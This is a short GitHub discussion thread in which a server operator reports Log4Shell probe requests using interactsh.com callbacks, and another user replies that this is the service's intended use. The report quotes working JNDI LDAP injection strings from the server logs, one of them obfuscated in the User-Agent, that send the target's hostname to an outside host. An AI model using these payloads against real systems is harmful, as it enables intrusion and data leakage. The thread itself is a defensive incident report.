### DISCUSSION TITLE
Someone "seems to be"  using interactsh.com to poke/exploit Log4Shell: RCE 0-day exploit

### DISCUSSION THREAD

**Discussion by leopucci** [projectdiscovery/interactsh#125] [General]
Hey there. 
Just warning that someone is using interact.sh to poke my server on the new exploit on log4j. 

`GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4o9naya6um6.interactsh.com/a`

```
IP #194.48.199.78# - GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4o9naya6um6.interactsh.com/a} HTTPSTATUS 404 - 8.200 ms - message: Not found 
 UA:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4o9naya6ucy.interactsh.com} ReqId: c48a312f-afd6-4241-967e-950522caa0bf
```

Technical details on exploit:
https://www.lunasec.io/docs/blog/log4j-zero-day/

**Comment by pdelteil** [comment]
Hey,

It's the intended use of interactsh. Same with burp collaborator.
